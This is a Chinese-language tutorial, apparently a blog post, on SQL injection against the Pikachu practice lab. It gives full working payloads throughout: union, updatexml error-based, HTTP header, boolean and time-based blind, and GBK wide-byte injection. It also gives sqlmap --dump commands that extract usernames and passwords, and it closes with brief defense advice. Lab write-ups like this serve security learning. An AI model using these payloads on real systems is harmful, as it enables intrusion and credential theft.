文章目录
- [1. SQL注入(Sql Inject)](#1. SQL注入(Sql Inject))
-
- [1.1 数字型注入(post)](#1.1 数字型注入(post))
- [1.2 字符型注入(get)](#1.2 字符型注入(get))
- [1.3 搜索型注入](#1.3 搜索型注入)
- [1.4 XX型注入](#1.4 XX型注入)
- [1.5 "insert/update"注入](#1.5 "insert/update"注入)
- [1.6 "delete"注入](#1.6 "delete"注入)
- [1.7 HTTP头注入](#1.7 HTTP头注入)
- [1.8 盲注(base on boolian)](#1.8 盲注(base on boolian))
-
- [1.8.1 ASCII试探](#1.8.1 ASCII试探)
- [1.8.2 SqlMap工具注入](#1.8.2 SqlMap工具注入)
- [1.9 盲注(base on time)](#1.9 盲注(base on time))
- [1.10 宽字节注入](#1.10 宽字节注入)
- [1.11 SQL注入漏洞防御](#1.11 SQL注入漏洞防御)
1. SQL注入(Sql Inject)
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中后,被当作SQL语句的一部分执行。
在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
- 对传进SQL语句里面的变量进行过滤,不允许危险字符传入。
- 使用参数化(Parameterized Query 或 Parameterized Statement)。
- 还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!
1.1 数字型注入(post)
首先在页面中选择一个参数进行查询
data:image/s3,"s3://crabby-images/938c7/938c75ed4029f27bf378282d69f8572ab86af4e5" alt=""
使用bp抓包查看
data:image/s3,"s3://crabby-images/49281/49281c35720dbf1a1e4bb40f34088bfaa95e3da5" alt=""
这里采用post方式传递数据,id=1&submit=%E6%9F%A5%E8%AF%A2
,可以确认的是数字型,这里可以直接在bp中修改数据包,也可以使用hackbar。
判断字段个数
id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/f1445/f1445e89b69b2248dedb13ea05d7f0d478392b31" alt=""
浏览器页面显示
data:image/s3,"s3://crabby-images/36719/3671996369a18cdf99fb68bc230ecb35d54919de" alt=""
一共两个字段。
联合查询获取数据
id=1 union select database(),user()&submit=%E6%9F%A5%E8%AF%A2
- database():将会返回当前网站所使用的数据库名字。
- user():将会返回执行当前查询的用户名。
data:image/s3,"s3://crabby-images/07508/075081476983c6676cab98ba3ed9fa0a62a710d9" alt=""
data:image/s3,"s3://crabby-images/46627/4662760aa0b6f4a61edc33f213443cf5f19d7823" alt=""
获取到了数据名为pikachu。
获取表名
information_schema 是 mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。
data:image/s3,"s3://crabby-images/d6222/d6222e965022f6bf63f7d4d6d9572c4d3747df0e" alt=""
id=1 union select table_name,2 from information_schema.tables where table_schema = 'pikachu'&submit=%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/d6f38/d6f38ecf99b9b6c172c88a8dcedc03276a407b5d" alt=""
浏览器页面显示
data:image/s3,"s3://crabby-images/ff80e/ff80e6d520feff883a25184be671b202859d0bd1" alt=""
获取到了五张表:httpinfo,member,message,users,xssblind而我们要对users这个表进行破解字段。
获取表中的字段名
id=1 union select column_name,2 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'&submit=%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/0443e/0443e051a610ab6fa35ad1bc72724ac667f9beb0" alt=""
浏览器页面显示
data:image/s3,"s3://crabby-images/5908d/5908de81db3f623b410935084ed67297f228e16a" alt=""
获取到了字段有id,username,password,level。
查看用户名和密码
id=1 union select username,password from users&submit=%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/cf2fb/cf2fb98015826d01b685d0823e6c8485735cebed" alt=""
浏览器页面显示
data:image/s3,"s3://crabby-images/0afed/0afed1a2706dcaa50cd78380e93a7fd8be13350e" alt=""
1.2 字符型注入(get)
输入一个名字查看
data:image/s3,"s3://crabby-images/46fc8/46fc88a118ab3821bf48f65463e14da8eb8a3c4c" alt=""
发现输入的参数会在URL上显示出来,说明php页面通过get方法传递参数,所以这里不需要抓包。
直接在输入框中执行SQL注入命令。
判断字段个数
lucy' order by 2 #
data:image/s3,"s3://crabby-images/deebf/deebf84b2a1bc806eac26256e85e1bda21674cfd" alt=""
联合查询获取数据
lucy' union select database(),user()#
data:image/s3,"s3://crabby-images/79e0e/79e0ef1476502878a10e810a1adb711c7a320061" alt=""
获取表名
lucy' union select table_name,2 from information_schema.tables where table_schema = 'pikachu'#
data:image/s3,"s3://crabby-images/785ad/785ada1d6e4d2ad19f2bac4e4bd59e04767d27da" alt=""
获取表中的字段名
lucy' union select column_name,2 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'#
data:image/s3,"s3://crabby-images/1d2de/1d2decb26744907c34b24c19e4147b9c18fdeb21" alt=""
查看用户名和密码
lucy' union select username,password from users#
data:image/s3,"s3://crabby-images/d2e29/d2e298712c444fe3d693d7798516e8bd2e625118" alt=""
1.3 搜索型注入
漏洞分析
搜索型注入,常见是使用like进行查找搜索(模糊匹配),数据库的搜索语句一般是。
sql
select * from 表名 where username like '%$name%'
所以我们可以利用order判断字段数
判断字段个数
lucy%' order by 3#
(%'是闭合前面,#是注释后面)
data:image/s3,"s3://crabby-images/6ac17/6ac1755a0afc102e7f477d24ac428ae2c7f8b7fc" alt=""
联合查询获取数据
luc%' union select database(),user(),3#
由于有三个字段,所以要在查询的时候再添加一个查询条件。
data:image/s3,"s3://crabby-images/b974e/b974ea5af264c886de5a32c3481b0ed1fe2311bf" alt=""
获取表名
lucy%' union select table_name,2,3 from information_schema.tables where table_schema = 'pikachu'#
data:image/s3,"s3://crabby-images/0e8ae/0e8aec8dd4a4bcebab0c78cebf9fd4caf8874aa5" alt=""
获取表中的字段名
lucy%' union select column_name,2,3 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'#
data:image/s3,"s3://crabby-images/023ef/023ef9d82866b6fa146c12d101033f35b0b13c06" alt=""
查看用户名和密码
lucy%' union select username,password,id from users#
data:image/s3,"s3://crabby-images/83555/835553a2d5ba40f561b42946cfebef940212faa2" alt=""
1.4 XX型注入
所谓的XX型注入, 就是输入的值可能被各种各样的符合闭合 (比如, 单引号双引号括号等),所以需要找到闭合。
首先输入单引号
data:image/s3,"s3://crabby-images/284a8/284a86c28e97a5b44ee352b6703b7ede99628508" alt=""
推测数据库查询语句为:
sql
select * from users where username=('$name');
判断字段个数
lucy') order by 2 #
data:image/s3,"s3://crabby-images/9dd04/9dd046e59813bbca272295f5ca6b1fc6ce74cd9f" alt=""
联合查询获取数据
lucy') union select database(),user()#
data:image/s3,"s3://crabby-images/c31f9/c31f9b2f42002f3ca0423780789b4337e6b8b08e" alt=""
获取表名
lucy') union select table_name,2 from information_schema.tables where table_schema = 'pikachu'#
data:image/s3,"s3://crabby-images/c7317/c7317ddbf7638e5b25ee548a3c2cb3fc5ad6a965" alt=""
获取表中的字段名
lucy') union select column_name,2 from information_schema.columns where table_name = 'users' and table_schema = 'pikachu'#
data:image/s3,"s3://crabby-images/a651f/a651fd822e7c6d1ca51ee252c56115044225a4fc" alt=""
查看用户名和密码
lucy') union select username,password from users#
data:image/s3,"s3://crabby-images/c9bc9/c9bc9698ae64b454729ca234a708c91d7e097a34" alt=""
1.5 "insert/update"注入
首先注册一个账号
data:image/s3,"s3://crabby-images/1557a/1557a42b2962c14da31010d7516c05b8396472ef" alt=""
填写注册信息
data:image/s3,"s3://crabby-images/11043/1104327d365c720b9d3060dfc29a1151967dfcb6" alt=""
点击提交的时候抓包查看
data:image/s3,"s3://crabby-images/7a6e6/7a6e6dd7200ef13cae7dcc8312762a77c7f72cb3" alt=""
漏洞分析:产生insert/update注入,是因为在用户注册和更新信息的时候存在注入点。
首先分析insert注入:
insert注入存在于用户注册时候的过程,当用户注册新信息并提交服务器的时候,服务端采用insert来将信息插入数据库。
insert语句:
sql
insert into users(username,password)values($username,$password);
update语句:
sql
update users set username=$username,password=$password where username=$username;
漏洞利用
用updatexml()进行报错注入。
updatexml()
是 MySQL 数据库中的一个函数,用于在 XML 字符串中更新指定路径的值。
sqlupdatexml(xml_target, xpath_expr, new_value)
参数解析:
xml_target
:要更新的 XML 字符串或 XML 类型的列。xpath_expr
:XPath 表达式,指定要更新的节点路径。new_value
:String格式,替换查找到的符合条件的数据要替换的新值。注意:
- 如果找不到与给定的 XPath 表达式匹配的节点,
updatexml()
函数将返回 NULL。- 如果在更新节点时遇到错误(例如,无效的 XPath 表达式),函数将抛出错误。
将之前抓包的数据发送到重发器上,在用户名后面输入如下内容:
username=wuhu' and updatexml(1,0x7e,3)and '&password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit
data:image/s3,"s3://crabby-images/2b8e9/2b8e94aacfcc8e0ff99029b8e825a884a6a26df6" alt=""
可以看到有报错回复。
data:image/s3,"s3://crabby-images/60782/6078261895990a9db447d6eca9bc05a1b37f037b" alt=""
获取数据库名
username=wuhu' and updatexml(1,concat(0x7e,database()),3)and '&password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit
说明: concat(0x7e,database())
,这是一个函数调用,将两个字符串进行连接。其中 0x7e
是波浪号(tilde)的十六进制表示,database()
是一个 SQL 函数,用于返回当前数据库的名称。
data:image/s3,"s3://crabby-images/1890b/1890bfa09ed3e84383ce21d7ac5da38f1bad3cca" alt=""
获取表名
username=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu' )),3) and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit
说明:
GROUP_CONCAT()
是一个 SQL 聚合函数,用于将多行结果按照指定的顺序连接成一个字符串。
data:image/s3,"s3://crabby-images/962da/962dab8cb154564acbb55753d488b612f04c9b91" alt=""
获取字段名
username=123' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit
这里推荐使用HackBar,bp看着眼睛疼。
limit 0,1 user_id
limit 1,1 first_name
limit 2,1 last_name
limit 3,1 user
limit 4,1 password
data:image/s3,"s3://crabby-images/19a8e/19a8ed0c8e7872213288c1752b5c4006c1e0edf2" alt=""
获取用户名和密码
用户名:
username=123' and updatexml(1,concat(0x7e,(select username from users limit 0,1 ),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit
data:image/s3,"s3://crabby-images/d9825/d9825d8c7c057d3481331f9cba8663fe7271b47e" alt=""
密码:
http
username=123' and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 0,1),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit
username=123' and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 1,1),0x7e),3)and ' &password=123456&sex=%E7%94%B7&phonenum=15088888888&email=%E5%8C%97%E4%BA%AC&add=%E5%8C%97%E4%BA%AC&submit=submit
参数说明:
-
substr():用于从字符串中提取子串。
-
函数原型:
sql
SUBSTR(string, start_position, length)
string
:要提取子串的原始字符串。start_position
:指定子串开始的位置(索引),其中第一个字符的索引为 1。length
:可选参数,指定要提取的子串的长度。
data:image/s3,"s3://crabby-images/0768f/0768f31bd89dd99932ce7db28f743ee7c49d9617" alt=""
data:image/s3,"s3://crabby-images/acba8/acba8b190ddf184cb00311505487e1e16d8132ee" alt=""
这里密码太长了,分段显示。
1.6 "delete"注入
delete也是利用报错进行sql盲注。
在留言板中随便输入,然后提交
data:image/s3,"s3://crabby-images/2feca/2feca36ce15c12bb565c94a2e25928be2124d836" alt=""
在删掉留言的时候抓包,发现有id,试着利用这个id作一个报错注入。
data:image/s3,"s3://crabby-images/9899d/9899d7cb2ac58e1ee45bf211ad5a365fc424bdfd" alt=""
获取数据库名称
sh
http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
data:image/s3,"s3://crabby-images/0e8ae/0e8ae4f3b0549f4ff533cf6ad847783eea6d3ee9" alt=""
获取数据库中的表
sh
http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)
data:image/s3,"s3://crabby-images/69046/69046b08b638ff11e478f6357ee439df3d7b38af" alt=""
获取users表中的字段
sh
http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)
data:image/s3,"s3://crabby-images/d6489/d64897a7fcdbd1fce532a8a361fcb443298d9d46" alt=""
获取用户名和密码
用户名
sh
http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)
data:image/s3,"s3://crabby-images/acf62/acf620cfc2f13f16278ca56b97c0f15b03393f3d" alt=""
密码
sh
http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 0,1),0x7e),1)
data:image/s3,"s3://crabby-images/bc4c9/bc4c9eae6cb416a1d1fa7d0cacc5b603940a635e" alt=""
sh
http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=56 and updatexml(1,concat(0x7e,(select substr(password,17,32) from users limit 0,1),0x7e),1)
data:image/s3,"s3://crabby-images/76a4f/76a4f566e2779a892fe130c1b5c4c80436059bd3" alt=""
1.7 HTTP头注入
登录后页面效果
data:image/s3,"s3://crabby-images/76707/767075fb0b0aea07a32b416e8d7ca3ea8d3f1381" alt=""
点击退出进行抓包查看,在下图红框中进行注入
data:image/s3,"s3://crabby-images/3fdb6/3fdb665c69c439efeaa6362d72265a74526813de" alt=""
判断闭合
输入单引号,页面报错
data:image/s3,"s3://crabby-images/03c98/03c98ef30363256dd09cdb3e11adcc884dae1bb1" alt=""
后面添加注释
data:image/s3,"s3://crabby-images/868f6/868f6c44632e2d709f9d124413876cf5aa909739" alt=""
注释掉还报错,考虑前/后闭合。123' and '1
。
获取数据库名
sh
123' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1
data:image/s3,"s3://crabby-images/a0bac/a0bac7de1503ed25caed7c2d6df3bb989534866b" alt=""
获取数据库中的表
sh
123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '1
data:image/s3,"s3://crabby-images/799bc/799bc1e5b24258f25fe26d75416d5738fe25ce99" alt=""
获取users表中的字段
sh
123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) and '1
data:image/s3,"s3://crabby-images/5335a/5335a7c05d2317acefe6e04efd30df2c90a31589" alt=""
获取用户名和密码
用户名
sh
123' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) and '1
data:image/s3,"s3://crabby-images/11205/11205961bc1767b229a9f2ca37b7e90d9776766c" alt=""
密码
sh
123' and updatexml(1,concat(0x7e,(select substr(password,1,16) from users limit 0,1),0x7e),1) and '1
data:image/s3,"s3://crabby-images/c39bc/c39bc08c35df5b5793268bee542aa9046f7ebcca" alt=""
sh
123' and updatexml(1,concat(0x7e,(select substr(password,17,32) from users limit 0,1),0x7e),1) and '1
data:image/s3,"s3://crabby-images/b4cfe/b4cfe79ca03e68d94e659ea756e321f2635ea375" alt=""
1.8 盲注(base on boolian)
1.8.1 ASCII试探
判断闭合
输入lucy',用户名不存在,然后在后面加上注释
sh
lucy' #
data:image/s3,"s3://crabby-images/a49c0/a49c0592dd4ca2689c7cb86e4b229af0d3f0c958" alt=""
说明是字符型注入。
获取数据库名
lucy' and length(database())=8 #
data:image/s3,"s3://crabby-images/7bc96/7bc96ff9d722c8e6de7db0fe75e6b9cb0dd3a951" alt=""
lucy' and length(database())=7 #
data:image/s3,"s3://crabby-images/f920f/f920ff1e6ad1034ceb131a6fb438cd4681f2c52f" alt=""
说明数据库名称有7位,接下来就是获取数据库中的每一位是什么了。
按位测试
sh
lucy' and ascii(substr(database(),1,1))=115 # # 第1位p
说明:
-
ascii()
是一个常见的函数或方法名称,用于获取字符的 ASCII 码值。 -
下图中的%23是井号的URL编码。
data:image/s3,"s3://crabby-images/e97fb/e97fbfdf3f32f8219c5ebc10510c5e4b57128426" alt=""
按照这样的方式反复尝试,获取到数据库名:pikachu
sh
lucy' and ascii(substr(database(),2,1))=105 %23 #第2位i
lucy' and ascii(substr(database(),3,1))=107 %23 #第3位k
lucy' and ascii(substr(database(),4,1))=97 %23 #第4位a
lucy' and ascii(substr(database(),5,1))=99 %23 #第5位c
lucy' and ascii(substr(database(),6,1))=104 %23 #第6位h
lucy' and ascii(substr(database(),7,1))=117 %23 #第6位u
获取数据库表名
sh
lucy' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104 %23
data:image/s3,"s3://crabby-images/80f59/80f598cf4e09c6a6fa07c05105134279b4e90b4a" alt=""
sh
lucy' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),2,1))=116 %23
这里通过之前获取到的数据库表名有httpinfo,member,message,users,xssblind。
同样表中的字段,以及用户名和密码,都是以这种盲注的形式来获取的。
1.8.2 SqlMap工具注入
使用sqlmap工具进行输入。
使用bp抓包截取cookie信息
data:image/s3,"s3://crabby-images/3eb38/3eb387eb7caa7dc1e71bb95237c4f6715d2a8806" alt=""
启动sqlmap,在上图中复制URL和cookie,在sqlmap中输入:sqlmap --u '复制的URL' --cookie='复制的cookie' 。
获取数据库名
sh
sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0" --dbs
data:image/s3,"s3://crabby-images/22777/22777f39db411e3c18474d5e77dd730e183ed8d2" alt=""
获取数据库中的表
sh
sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0" -D "pikachu" --tables
data:image/s3,"s3://crabby-images/95e49/95e49cdd15b85ca2872bcd33020db5e2049f8e9a" alt=""
获取表中的字段
sh
sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0" -D "pikachu" -T "users" --columns
data:image/s3,"s3://crabby-images/cc9ad/cc9adcd723165973821df11af3ac020ebca3c387" alt=""
获取用户名和密码
sh
sqlmap -u "http://192.168.188.183//pikachu/vul/sqli/sqli_blind_b.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2" --cookie="PHPSESSID=bdv4iol6gtj7mv1fp4lppnqtg0" -D "pikachu" -T "users" -C "username,password" --dump
data:image/s3,"s3://crabby-images/c3bc3/c3bc327efe5140f7f4fc9a789134d4a07f32c0c9" alt=""
1.9 盲注(base on time)
用sleep() 语句的延时性,以时间线作为判断条件。如果成功执行了,就延时x秒。
判断闭合
kobe' and sleep(5) #
data:image/s3,"s3://crabby-images/cdaf6/cdaf6bb17619b85b4b1c5f34b87c6586d8bdaf51" alt=""
在输入单引号的时候,页面直接刷新成功,在后加上注释,页面延时了5秒,证明闭合方式为单引号。
获取数据库长度
kobe' and if(length(database())=7,sleep(5),1) #
data:image/s3,"s3://crabby-images/7998d/7998db31d13c9003a7d0e8ed32abc27224db1dfe" alt=""
获取数据库名称
kobe' and if(substr(database(),1,1)='p' ,sleep(5),1) #
data:image/s3,"s3://crabby-images/3c0b2/3c0b26b5ebca37a8dcb8d8427df478544f2608af" alt=""
获取数据库中的第一个表的第一个字母
kobe' and if(ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=104 ,sleep(5),1) #
data:image/s3,"s3://crabby-images/d33c9/d33c94e41d66a2c3d47dbd24a4feadc1a0773598" alt=""
其他就不在演示,都是相同的道理,主要是太麻烦了。
总结 :时间盲注整体上是在布尔盲注的基础上增加if判断,并且与sleep配合,布尔盲注是当对的时候,返回正确的值,错误的时候返回错误的值。而时间盲注,不管正确还是错误都不会返回值,需要依靠延迟来判断。
同样这里可以使用sqlmap工具注入的方式来破解。
1.10 宽字节注入
宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。
GBK 汉字编码方案,双字节编码,两个字节作为一个汉字。GBK 编码范围[8140,FEFE],可以通过汉字字符集编码查询。
判断闭合
输入kobe,页面正常显示
data:image/s3,"s3://crabby-images/325be/325beadcd9139b93f8e04af5cd81462f10cb8276" alt=""
接着输入单引号,发现页面报错,抓包查看。
data:image/s3,"s3://crabby-images/0a6c4/0a6c4122d3a38062bd0821736189581875357f4e" alt=""
服务器将单引号进行了转义,单引号由原来的'
转换为了\'
,这里面的\
表示5c,那么我们现在可以使用GBK编码,在5c前面添加一个字符,使得该字符与5c组合为一个汉字。(这个字符的范围在[8140,FEFE]之间即可)
我们在前面加上%81就是%81%5c%27,%81%5c会被编码为一个汉字。
kobe%81' or 1=1 #
data:image/s3,"s3://crabby-images/564e8/564e811113bcf899e7a0ae361b4604861c0af4e7" alt=""
获取数据库名
http
name=kobe%81' union select table_name,2 from information_schema.tables where table_schema = database()# &submit=%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/3b3a7/3b3a78283714916f79a1ed031d6301e83904a469" alt=""
获取users表中的字段名
由于单引号被转义了,所以可以采用十六进制的方式来代替'user'的使用。
data:image/s3,"s3://crabby-images/e8eeb/e8eebce97e4f715cd42615b4ed13bea33d6bf381" alt=""
http
name=kobe%81' union select column_name,2 from information_schema.columns where table_schema = database() and table_name=0x7573657273 # &submit=%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/32cf2/32cf21c869436999c7de433d81699fa4aa6c71a1" alt=""
获取用户名和密码
name=kobe%81' union select username,password from users # &submit=%E6%9F%A5%E8%AF%A2
data:image/s3,"s3://crabby-images/aa2f1/aa2f14cd7036f8a4d2ba5bf3d69daa78ee7bd768" alt=""
1.11 SQL注入漏洞防御
-
避免采用拼接的方式构造SQL 语句,可以采用预编译等技术。
-
对进入SQL 语句的参数进行足够过滤。
-
部署安全设备比如WAF(web应用安全防火墙)。
-
现行很多开发框架,基本上已经从技术上,解决SQL 注入问题。